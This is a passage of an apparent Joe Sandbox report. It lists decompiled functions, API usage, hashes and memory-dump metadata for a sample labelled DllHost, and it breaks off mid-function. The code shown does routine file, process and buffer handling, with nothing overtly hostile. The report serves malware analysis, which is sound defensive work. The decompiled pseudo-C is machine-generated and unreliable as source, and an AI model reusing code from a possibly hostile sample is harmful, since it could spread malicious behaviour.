                                                                                                                                                              • Instruction ID: e9863ec42f6003525e56d1ab1cc7136cb4c712828da9fde26f5cb9ae0083b797
                                                                                                                                                              • Opcode Fuzzy Hash: e111c58219c25ba23558f1c052d844fd2b320cad249f3338204538bf35e22dd1
                                                                                                                                                              • Instruction Fuzzy Hash: 31212A21A09E4684FA14BF26E854279A7F1FF48FA8F994031CA0D07765DF3CE4CAC250
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C8540 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                              • Opcode ID: 33206590d02683c51db2a12c977e714d746c64457085c8f4d9e3df00b9a584f7
                                                                                                                                                              • Instruction ID: a6b2d7d7b3ed9badac782c5f0bf349ed84a2e38a5caeaaa80185901d29477c74
                                                                                                                                                              • Opcode Fuzzy Hash: 33206590d02683c51db2a12c977e714d746c64457085c8f4d9e3df00b9a584f7
                                                                                                                                                              • Instruction Fuzzy Hash: C801A571F28A0242FB646F69B1C4A39E2B0BF44BB8F944135DE1D42684DE6CE8CA9711
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B5270 Relevance: 4.5, APIs: 3, Instructions: 39processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2922976086-0
                                                                                                                                                              • Opcode ID: e647e1f017915ae98658e44932b4af13bb894ecb07bfd1dd7fe50d7eb2abbb60
                                                                                                                                                              • Instruction ID: 8afe915644adf3d00d140a78c9291eac4c262bde3bcd1e185dc46dd1997d84cd
                                                                                                                                                              • Opcode Fuzzy Hash: e647e1f017915ae98658e44932b4af13bb894ecb07bfd1dd7fe50d7eb2abbb60
                                                                                                                                                              • Instruction Fuzzy Hash: 31110833A28F8186E350DB20E84436EB3B0F7D9358F525239EA8D02A24EF79D0D5CB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C85E0 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                              • Opcode ID: 7a1e2c7d72ec1b0eb957fb1365e55bb8b5d0338ac320f84435a22b938b6dbdae
                                                                                                                                                              • Instruction ID: 908f3d66d3bc8d3d49e8fda4501906533c4fc97ecbf6ddd21e6fd1fbe46d59a6
                                                                                                                                                              • Opcode Fuzzy Hash: 7a1e2c7d72ec1b0eb957fb1365e55bb8b5d0338ac320f84435a22b938b6dbdae
                                                                                                                                                              • Instruction Fuzzy Hash: F10180B2A19A4082FB549F25B080129A2B1FB84BB4F581325EE7E477D8DF3CD4D59B10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C3230 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00007FF77FF7191C3230(long long __rbx, void* __rcx, long long __rdx, void* __r11) {
				void* _t39;
				void* _t41;
				void* _t50;
				void* _t52;
				signed long long _t61;
				void* _t69;
				intOrPtr _t84;
				void* _t87;
				long long _t90;
				void* _t92;
				void* _t93;
				void* _t95;
				signed long long _t96;
				void* _t98;
				void* _t104;

				_t104 = __r11;
				 *((long long*)(_t95 + 0x18)) = __rbx;
				_t93 = _t95 - 0x110;
				_t96 = _t95 - 0x210;
				_t61 =  *0x192190a0; // 0x590452ce5669
				 *(_t93 + 0x100) = _t61 ^ _t96;
				_t69 = __rcx;
				 *((long long*)(_t96 + 0x60)) = __rdx;
				r8d = 0x100;
				E00007FF77FF7191D4A30(_t39, 0, _t93, __rdx, _t98);
				 *((intOrPtr*)(_t96 + 0x38)) = 0;
				 *((long long*)(_t96 + 0x30)) = _t90;
				 *((intOrPtr*)(_t96 + 0x28)) = 0;
				 *((long long*)(_t96 + 0x20)) = _t90;
				r9d = 0x100;
				_t41 = E00007FF77FF7191C64B0(_t93, _t87, _t90); // executed
				if (_t41 != 0) goto 0x191c3386;
				 *((long long*)(_t93 - 0x20)) = _t90;
				 *((long long*)(_t93 - 0x10)) = _t90;
				 *((long long*)(_t93 - 8)) = 0xf;
				 *((intOrPtr*)(_t93 - 0x20)) = sil;
				if ( *((intOrPtr*)(_t93 + 0xffffffff)) != sil) goto 0x191c32c7;
				E00007FF77FF7191BA9A0(_t93 - 0x20, _t93, 0);
				 *((intOrPtr*)(_t96 + 0x50)) =  *((intOrPtr*)(_t93 - 0x80));
				 *((intOrPtr*)(_t96 + 0x48)) =  *((intOrPtr*)(_t93 - 0x50));
				 *((intOrPtr*)(_t96 + 0x40)) =  *((intOrPtr*)(_t93 - 0x4c));
				 *((intOrPtr*)(_t96 + 0x38)) =  *((intOrPtr*)(_t93 - 0x48));
				 *((intOrPtr*)(_t96 + 0x30)) =  *((intOrPtr*)(_t93 - 0x44));
				 *((intOrPtr*)(_t96 + 0x28)) =  *((intOrPtr*)(_t93 - 0x40));
				 *((intOrPtr*)(_t96 + 0x20)) =  *((intOrPtr*)(_t93 - 0x3c));
				_t50 = E00007FF77FF7191C1070(0,  *((intOrPtr*)(_t93 + 0xffffffff)) - sil, _t69, __rdx, _t93 - 0x20,  *((intOrPtr*)(_t93 - 0x78)),  *((intOrPtr*)(_t93 - 0x70)), _t104);
				_t84 =  *((intOrPtr*)(_t93 - 8));
				if (_t84 - 0x10 < 0) goto 0x191c335b;
				if (_t84 + 1 - 0x1000 < 0) goto 0x191c3356;
				if ( *((intOrPtr*)(_t93 - 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t93 - 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c3380;
				0x191d23d0(_t92);
				return E00007FF77FF7191D23B0(_t50, _t52,  *(_t93 + 0x100) ^ _t96);
			}


















                                                                                                                                                              0x7ff7191c3230
                                                                                                                                                              0x7ff7191c3230
                                                                                                                                                              0x7ff7191c3238
                                                                                                                                                              0x7ff7191c3240
                                                                                                                                                              0x7ff7191c3247
                                                                                                                                                              0x7ff7191c3251
                                                                                                                                                              0x7ff7191c325b
                                                                                                                                                              0x7ff7191c325e
                                                                                                                                                              0x7ff7191c3265
                                                                                                                                                              0x7ff7191c326f
                                                                                                                                                              0x7ff7191c3276
                                                                                                                                                              0x7ff7191c327a
                                                                                                                                                              0x7ff7191c327f
                                                                                                                                                              0x7ff7191c3283
                                                                                                                                                              0x7ff7191c3288
                                                                                                                                                              0x7ff7191c329b
                                                                                                                                                              0x7ff7191c32a2
                                                                                                                                                              0x7ff7191c32a8
                                                                                                                                                              0x7ff7191c32ac
                                                                                                                                                              0x7ff7191c32b0
                                                                                                                                                              0x7ff7191c32b8
                                                                                                                                                              0x7ff7191c32ce
                                                                                                                                                              0x7ff7191c32d8
                                                                                                                                                              0x7ff7191c32e1
                                                                                                                                                              0x7ff7191c32e8
                                                                                                                                                              0x7ff7191c32ef
                                                                                                                                                              0x7ff7191c32f6
                                                                                                                                                              0x7ff7191c32fd
                                                                                                                                                              0x7ff7191c3304
                                                                                                                                                              0x7ff7191c330b
                                                                                                                                                              0x7ff7191c331e
                                                                                                                                                              0x7ff7191c3324
                                                                                                                                                              0x7ff7191c332c
                                                                                                                                                              0x7ff7191c333f
                                                                                                                                                              0x7ff7191c3354
                                                                                                                                                              0x7ff7191c3356
                                                                                                                                                              0x7ff7191c337f

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: Error, couln't get the current entry info
                                                                                                                                                              • API String ID: 3668304517-3073648769
                                                                                                                                                              • Opcode ID: 0d891c598b3b30ecb74ad8a2e27829abe9bd23a1cfc0f9bd2a27e26f7a44938d
                                                                                                                                                              • Instruction ID: 42557c65189c719d5c9a5be48b69f79f8d2991cf34edadfa826d56bcdadc0666
                                                                                                                                                              • Opcode Fuzzy Hash: 0d891c598b3b30ecb74ad8a2e27829abe9bd23a1cfc0f9bd2a27e26f7a44938d
                                                                                                                                                              • Instruction Fuzzy Hash: 5A419332B24A419AFB10DF68E8402DD77B0F7487ACF500226EA5C53A99DF78D586C710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C8230 Relevance: 3.1, APIs: 2, Instructions: 75fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                              • Opcode ID: 36bd052dcca5dc89c424d05172f9d55d0b76266fdb65bd2081a53faa75f564e5
                                                                                                                                                              • Instruction ID: 1175f155d3dabb0cee6b22f5dd5aee9814903cb91d490d7b75cebe0223b49e8b
                                                                                                                                                              • Opcode Fuzzy Hash: 36bd052dcca5dc89c424d05172f9d55d0b76266fdb65bd2081a53faa75f564e5
                                                                                                                                                              • Instruction Fuzzy Hash: 1A21B131A18F4585FA14AF15B054279F7A1EB84BB8F840238DA5E07BC4DF3CE886D355
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E5500 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191E5500(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t74;
				long long _t78;
				intOrPtr _t79;
				void* _t96;
				long _t99;

				_t74 = _t96;
				 *((long long*)(_t74 + 8)) = __rbx;
				 *((long long*)(_t74 + 0x10)) = __rbp;
				 *((long long*)(_t74 + 0x18)) = __rsi;
				 *((long long*)(_t74 + 0x20)) = __rdi;
				r14d = 0;
				_t78 =  *((intOrPtr*)(0x7ff71921b728)) + 2;
				if (_t78 - 1 <= 0) goto 0x191e5553;
				 *0x7FF71921B738 =  *0x7FF71921B738 | 0x00000080;
				goto 0x191e55e2;
				 *0x7FF71921B738 = 0x81;
				if (0 == 0) goto 0x191e5574;
				if (0 == 0) goto 0x191e556d;
				goto 0x191e5579;
				goto 0x191e5579;
				GetStdHandle(_t99);
				_t21 = _t78 + 1; // 0x1
				if (_t21 - 1 <= 0) goto 0x191e5597;
				GetFileType(??); // executed
				goto 0x191e5599;
				if (0 == 0) goto 0x191e55bd;
				 *((long long*)(0x7ff71921b728)) = _t78;
				if (0 != 2) goto 0x191e55b1;
				 *0x7FF71921B738 =  *0x7FF71921B738 | 0x00000040;
				goto 0x191e55e2;
				if (0 != 3) goto 0x191e55e2;
				 *0x7FF71921B738 =  *0x7FF71921B738 | 0x00000008;
				goto 0x191e55e2;
				 *0x7FF71921B738 =  *0x7FF71921B738 | 0x00000040;
				 *((long long*)( *0x7FF71EF89468 + 0x28)) = 0xfffffffe;
				_t79 =  *0x1921b2c8; // 0x208c7896e90
				if (_t79 == 0) goto 0x191e55e2;
				 *((intOrPtr*)( *((intOrPtr*)(_t99 + _t79)) + 0x18)) = 0xfffffffe;
				if (1 != 3) goto 0x191e551e;
				return 0;
			}








                                                                                                                                                              0x7ff7191e5500
                                                                                                                                                              0x7ff7191e5503
                                                                                                                                                              0x7ff7191e5507
                                                                                                                                                              0x7ff7191e550b
                                                                                                                                                              0x7ff7191e550f
                                                                                                                                                              0x7ff7191e551b
                                                                                                                                                              0x7ff7191e553f
                                                                                                                                                              0x7ff7191e5547
                                                                                                                                                              0x7ff7191e5549
                                                                                                                                                              0x7ff7191e554e
                                                                                                                                                              0x7ff7191e5553
                                                                                                                                                              0x7ff7191e555c
                                                                                                                                                              0x7ff7191e5561
                                                                                                                                                              0x7ff7191e556b
                                                                                                                                                              0x7ff7191e5572
                                                                                                                                                              0x7ff7191e5579
                                                                                                                                                              0x7ff7191e5582
                                                                                                                                                              0x7ff7191e558a
                                                                                                                                                              0x7ff7191e558f
                                                                                                                                                              0x7ff7191e5595
                                                                                                                                                              0x7ff7191e559b
                                                                                                                                                              0x7ff7191e55a0
                                                                                                                                                              0x7ff7191e55a8
                                                                                                                                                              0x7ff7191e55aa
                                                                                                                                                              0x7ff7191e55af
                                                                                                                                                              0x7ff7191e55b4
                                                                                                                                                              0x7ff7191e55b6
                                                                                                                                                              0x7ff7191e55bb
                                                                                                                                                              0x7ff7191e55bd
                                                                                                                                                              0x7ff7191e55c2
                                                                                                                                                              0x7ff7191e55cb
                                                                                                                                                              0x7ff7191e55d5
                                                                                                                                                              0x7ff7191e55db
                                                                                                                                                              0x7ff7191e55eb
                                                                                                                                                              0x7ff7191e560b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                              • Opcode ID: 005f6204bb13c3ce570f6acf184fd83e254a263677609f2c73dc8294747c6a2d
                                                                                                                                                              • Instruction ID: 83545ea31244c6f8c968e40e21a0f817d3f06875bd8dbb0976be0b2d42c9aa50
                                                                                                                                                              • Opcode Fuzzy Hash: 005f6204bb13c3ce570f6acf184fd83e254a263677609f2c73dc8294747c6a2d
                                                                                                                                                              • Instruction Fuzzy Hash: 6F31A721A18E4582FB619F14A440178B771FF45BB8BA80339E76E173E4DF38E496E310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DCBAC Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7191DCAC0), ref: 00007FF7191DCBE3
                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7191DCAC0), ref: 00007FF7191DCBF7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                              • Opcode ID: 2771f42e286d4dcd2e1326a574d9c614ad66b8671ca6962404e4c0440a715c9c
                                                                                                                                                              • Instruction ID: 8535fe46381f3432861d0bc7eae1d392bf7dd9829133a8a7b1e80cdc79c8ea5e
                                                                                                                                                              • Opcode Fuzzy Hash: 2771f42e286d4dcd2e1326a574d9c614ad66b8671ca6962404e4c0440a715c9c
                                                                                                                                                              • Instruction Fuzzy Hash: 70118271F14A1689FB50AF71B4410BD77B0AB04B7CB800635EE6E555D4EF2CE19AE720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C84D0 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                                              • Opcode ID: 58eeb5d9c73b21120ea8e730640d3ee5ea8fe2e748cd6616c59dcba92318625c
                                                                                                                                                              • Instruction ID: c4f361cf76f5747b323abf85c8a5dc07513be64518e8c2e514f784a4860c29e9
                                                                                                                                                              • Opcode Fuzzy Hash: 58eeb5d9c73b21120ea8e730640d3ee5ea8fe2e748cd6616c59dcba92318625c
                                                                                                                                                              • Instruction Fuzzy Hash: 17F0C876B0894182FB509F19F480029E3B5FF94BE8BA84032EF5983724DF3DD4C59A00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D9A50 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                              			E00007FF77FF7191D9A50() {
				int _t1;
				void* _t9;
				void* _t10;

				r8d = 2; // executed
				_t1 = MoveFileExW(??, ??, ??); // executed
				if (_t1 != 0) goto 0x191d9a76;
				E00007FF77FF7191DC7E4(GetLastError(), _t9, _t10);
				goto 0x191d9a78;
				return 0;
			}






                                                                                                                                                              0x7ff7191d9a54
                                                                                                                                                              0x7ff7191d9a5a
                                                                                                                                                              0x7ff7191d9a62
                                                                                                                                                              0x7ff7191d9a6c
                                                                                                                                                              0x7ff7191d9a74
                                                                                                                                                              0x7ff7191d9a7c

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastMove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 55378915-0
                                                                                                                                                              • Opcode ID: bb53e1fbb5daa93906918b40e85fe4ba0570ea02252ba50efbd6ce9704566913
                                                                                                                                                              • Instruction ID: c967ad9c85432669e4e52259038419c6b5ebe5323c2db51964ee76c6223407f1
                                                                                                                                                              • Opcode Fuzzy Hash: bb53e1fbb5daa93906918b40e85fe4ba0570ea02252ba50efbd6ce9704566913
                                                                                                                                                              • Instruction Fuzzy Hash: 50D09E25F2991281FA143F72784A27C91B61F45739FD00634C51B811D1ED1CD1DF6621
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B8ED0 Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00007FF77FF7191B8ED0(void* __ecx, void* __edx, long long __rbx, void* __rcx, long long __rdi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v16;
				long long _v24;
				long long _v32;
				char _v48;
				char _v55;
				char _v56;
				char _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t116;
				signed long long _t130;
				intOrPtr* _t137;
				void* _t140;
				void* _t146;
				void* _t154;
				void* _t155;
				intOrPtr _t158;
				long long _t160;
				long long _t162;
				void* _t170;
				intOrPtr* _t178;
				intOrPtr _t187;
				void* _t191;
				void* _t194;
				intOrPtr _t197;
				long long* _t198;
				void* _t200;
				long long _t201;
				void* _t205;
				void* _t211;
				void* _t212;

				_t151 = __rbx;
				_a16 = __rbx;
				_a24 = __rdi;
				_t130 =  *0x192190a0; // 0x590452ce5669
				_v16 = _t130 ^ _t194 - 0x00000080;
				_t191 = __rcx;
				_t158 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38))));
				if (_t158 == 0) goto 0x191b8f2e;
				_t178 =  *((intOrPtr*)(__rcx + 0x50));
				_t197 =  *_t178;
				if (_t158 - _t158 + _t197 >= 0) goto 0x191b8f2e;
				 *_t178 = _t197 - 1;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)))) + 1;
				goto 0x191b9152;
				if ( *((long long*)(__rcx + 0x80)) != 0) goto 0x191b8f42;
				goto 0x191b9152;
				_t198 =  *((intOrPtr*)(__rcx + 0x18));
				if ( *_t198 != __rcx + 0x70) goto 0x191b8f6f;
				_t160 =  *((intOrPtr*)(__rcx + 0x88));
				 *_t198 = _t160;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) = _t160;
				_t137 =  *((intOrPtr*)(__rcx + 0x50));
				 *_t137 = __edx - __ecx;
				if ( *((long long*)(__rcx + 0x68)) != 0) goto 0x191b8f98; // executed
				_t86 = E00007FF77FF7191D9288(_t137, __rbx,  *((intOrPtr*)(__rcx + 0x80))); // executed
				if (_t86 == 0xffffffff) goto 0x191b9150;
				goto 0x191b9150;
				_v48 = _t137;
				_v32 = _t137;
				_v24 = 0xf;
				_v48 = 0;
				_t88 = E00007FF77FF7191D9288(_t137, _t151,  *((intOrPtr*)(__rcx + 0x80)));
				r8d = _t88;
				if (_t88 == 0xffffffff) goto 0x191b9114;
				_t162 = _v32;
				if (_t162 - _v24 >= 0) goto 0x191b8feb;
				_v32 = _t162 + 1;
				_t140 =  >=  ? _v48 :  &_v48;
				 *(_t140 + _t162) = r8b;
				 *((char*)(_t140 + _t162 + 1)) = 0;
				goto 0x191b8fff;
				r9d = r8b & 0xffffffff;
				r8d = 0;
				E00007FF77FF7191BC910( &_v48, _v24, __rcx, _t211, _t212);
				_t183 =  >=  ? _v48 :  &_v48;
				_t205 = _v32 + ( >=  ? _v48 :  &_v48);
				_t200 =  >=  ? _v48 :  &_v48;
				_v80 =  &_v64;
				_v88 =  &_v55;
				_v96 =  &_v56;
				_v104 =  &_v72;
				_t90 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x68)))) + 0x30))();
				_t116 = _t90;
				if (_t116 == 0) goto 0x191b9060;
				if (_t116 != 0) goto 0x191b90b7;
				if (_v64 !=  &_v56) goto 0x191b90cf;
				_t144 =  >=  ? _v48 :  &_v48;
				_t207 = _v72 - ( >=  ? _v48 :  &_v48);
				_t201 = _v32;
				_t208 =  <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48);
				_t170 =  >=  ? _v48 :  &_v48;
				_t202 = _t201 - ( <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48));
				_v32 = _t201 - ( <  ? _t201 : _v72 - ( >=  ? _v48 :  &_v48));
				E00007FF77FF7191D4380();
				goto 0x191b8fad;
				if (_t90 - 1 != 2) goto 0x191b9114;
				_t146 =  >=  ? _v48 :  &_v48;
